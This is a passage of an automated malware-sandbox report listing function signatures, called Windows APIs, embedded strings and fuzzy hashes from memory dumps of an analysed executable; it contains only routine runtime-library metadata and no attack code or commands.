                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Value$ErrorLast
                                                    • String ID:
                                                    • API String ID: 2506987500-0
                                                    • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction ID: cd2628154764f680192b7952b19706e241dc2444f548857d5f203ba214dd7b43
                                                    • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                    • Instruction Fuzzy Hash: D6118E20B0D24347FA9C63BD99A213963529F4C7F8F406334DB2E8EBD6DE2CA4428200
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                    • String ID:
                                                    • API String ID: 3326452711-0
                                                    • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                    • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                    • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                    • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                    • API String ID: 2984211723-1229430080
                                                    • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                    • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                    • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 4061214504-1276376045
                                                    • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction ID: 3a86c345665c3ed57e83abfe83415ca6f8ec61b604523bedc20baef7b0420bd3
                                                    • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                    • Instruction Fuzzy Hash: 25F06261B1970282EB148BB8E44533A6320AF887E5F541335CB6E8A6F4DF2CE049C350
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                                    • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                                    • ExitProcess.KERNEL32 ref: 0000000140008545
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressExitHandleModuleProcProcess
                                                    • String ID: CorExitProcess$mscoree.dll
                                                    • API String ID: 75539706-1276376045
                                                    • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                                    • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                                    • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1740715915-0
                                                    • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction ID: 8d3b547145718a80bd7c50ccffd6b4b7a18f7831c62cdb5565a47918caa85d6f
                                                    • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                                    • Instruction Fuzzy Hash: ABB19022E0A74283EA6DDB99D48227D6398AF54BC8F09A535DF4D8F799DF3CE4518300
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: FileInfoSleepStartupType
                                                    • String ID:
                                                    • API String ID: 1527402494-0
                                                    • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                    • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                                    • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                                    • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CommandLine$ByteCharErrorLastMultiWide
                                                    • String ID:
                                                    • API String ID: 3078728599-0
                                                    • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                                    • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                                    • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 1850339568-0
                                                    • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                                    • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                                    • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: _set_statfp
                                                    • String ID:
                                                    • API String ID: 1156100317-0
                                                    • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction ID: 5dfa0d8875c4621d6eeff7662dede5c605918e4cae0fe1786b6672f82e223d6c
                                                    • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                                    • Instruction Fuzzy Hash: 07118672E58A070AF75C12ECE57737912416F983F8F981734EB6E9E2EADE2C68414101
                                                    APIs
                                                    • FlsGetValue.KERNEL32(?,?,?,00007FF8BFAF766F,?,?,00000000,00007FF8BFAF790A,?,?,?,?,?,00007FF8BFAF7896), ref: 00007FF8BFAF96A3
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF766F,?,?,00000000,00007FF8BFAF790A,?,?,?,?,?,00007FF8BFAF7896), ref: 00007FF8BFAF96C2
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF766F,?,?,00000000,00007FF8BFAF790A,?,?,?,?,?,00007FF8BFAF7896), ref: 00007FF8BFAF96EA
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF766F,?,?,00000000,00007FF8BFAF790A,?,?,?,?,?,00007FF8BFAF7896), ref: 00007FF8BFAF96FB
                                                    • FlsSetValue.KERNEL32(?,?,?,00007FF8BFAF766F,?,?,00000000,00007FF8BFAF790A,?,?,?,?,?,00007FF8BFAF7896), ref: 00007FF8BFAF970C
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction ID: fb449941121f3faea8de7fee7be81391f2d70dfd763298b4855cc3b23bcdd28a
                                                    • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                                    • Instruction Fuzzy Hash: 38114F20E1D24347FA5C6BBDA9A317963515F4C3F8F546334EA3D8EAD6EE2CA4428600
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Value
                                                    • String ID:
                                                    • API String ID: 3702945584-0
                                                    • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction ID: dbebf77767904508d34f0c30f106dad9806cdfc95f22310824b58feb6c3d660c
                                                    • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                                    • Instruction Fuzzy Hash: 2411F550A0D2070BFA6CA7AD58A317913954F883E8F542634DB3E8E6D2EE2CB4468601
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction ID: 69ff2af82255b477e7a830284b15791350197ef2e19f789a2aec939ebc6ddd7c
                                                    • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                                    • Instruction Fuzzy Hash: 1B918E73A087818BE754DBA8E4412AD7BA0FB447CCF14612AEB4D9BB55DF38D1A5CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 2395640692-1018135373
                                                    • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction ID: 7084ff8546c07c244e6c85d85d706e6de437dc043c70c3702ea1f90f6d682be0
                                                    • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                                    • Instruction Fuzzy Hash: D051A032B197428BDB18AB6AD455ABC7391EB44BC8F509131DB8A8B788DF7DE851C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 3544855599-2084237596
                                                    • Opcode ID: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction ID: fb7e62fbaf536ae61246b4a773c2a536373c2c8662fd69814aa308abbb998389
                                                    • Opcode Fuzzy Hash: 5cda7244b452661d0672782f382aa0b3873e73ebf845244b9e3a73cca65a7280
                                                    • Instruction Fuzzy Hash: F661A332908BC586E7749B59E4413AAB7A0FB847C8F046235EB9D8BB55CF7CE190CB00
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                    • String ID: csm$csm
                                                    • API String ID: 3896166516-3733052814
                                                    • Opcode ID: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction ID: 797f35cb6f596ef175f13933d290eabb5734905dc108fee1d57c3d6537b4e2d3
                                                    • Opcode Fuzzy Hash: e758ec8c21499b3e432f6d95c1f73bf76a1a56d3c0875a2448db4a431929008f
                                                    • Instruction Fuzzy Hash: 22519F329183828FEB789B99D48626877A0EB45BC8F547135DB4D8BB95DF3CE460C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleLoadModuleProc
                                                    • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                    • API String ID: 3055805555-3733552308
                                                    • Opcode ID: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction ID: 601bfb796087d826a15eddab62e6da73c6b3e4e45b37998f9684764b2688f2d2
                                                    • Opcode Fuzzy Hash: 8c1e87d42adfe8e60614ff850b90a208d486e410194b6671aa5990fefe8541df
                                                    • Instruction Fuzzy Hash: 5C2136B1614B8582EB66DB23F8407DAA3A5B79C7C0F880526BB49577B5EF78C500C700
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentSizeWorking
                                                    • String ID: Shrinking process size
                                                    • API String ID: 2122760700-652428428
                                                    • Opcode ID: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                    • Instruction ID: de407452bcc55573093b25e37d4a5c8190b9a80636e05c4b95c6e58ff86151e7
                                                    • Opcode Fuzzy Hash: 928bd44cec0a58dd036a38053952d90c466f8539e57cdcef56d3cedc878990dc
                                                    • Instruction Fuzzy Hash: 74E0C9B4601A4191EA029F57A8A03D41260A74CBF0F815721AA290B2F0CE3985858310
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043530878.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000004.00000002.3043517937.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043547226.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043560685.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043573986.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_140000000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$Enter$Leave
                                                    • String ID:
                                                    • API String ID: 2801635615-0
                                                    • Opcode ID: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction ID: acd2e58e1a3fd81a861280768b65888603737fa84cc19007189881c9ae716cb0
                                                    • Opcode Fuzzy Hash: 5d43bde81a4cf71b6d13cac54dc418821bc3305084b6f84d33dc9cdc1ff96344
                                                    • Instruction Fuzzy Hash: D331137A225A4082EB128F1AF8407D57364F79DBF5F480221FF6A4B7B4DB3AC8858744
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff8bfaf0000_lSQb8c.jbxd
                                                    Similarity
                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                    • String ID:
                                                    • API String ID: 2718003287-0
                                                    • Opcode ID: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction ID: 8b5befedf4e2db586f5c76162ec9f051f47a149a6b5dc4cc451dd8bf6c3a1017
                                                    • Opcode Fuzzy Hash: 0c7799b21e1c94aa1fd225f6b85a6c051f6d6fdfc663a61abe1d9cd11d154d48
                                                    • Instruction Fuzzy Hash: 9BD1BC32B18A818AE715CBA9D4812EC37B5FB447DCB149236DF5D9BB99DE38E406C340
                                                    APIs
                                                    • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFAFED07), ref: 00007FF8BFAFEE38
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FF8BFAFED07), ref: 00007FF8BFAFEEC3
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3043600712.00007FF8BFAF1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFAF0000, based on PE: true
                                                    • Associated: 00000004.00000002.3043587847.00007FF8BFAF0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043617454.00007FF8BFB02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043631992.00007FF8BFB0D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000004.00000002.3043644797.00007FF8BFB0F000.00000002.00000001.01000000.00000009.sdmpDownload File
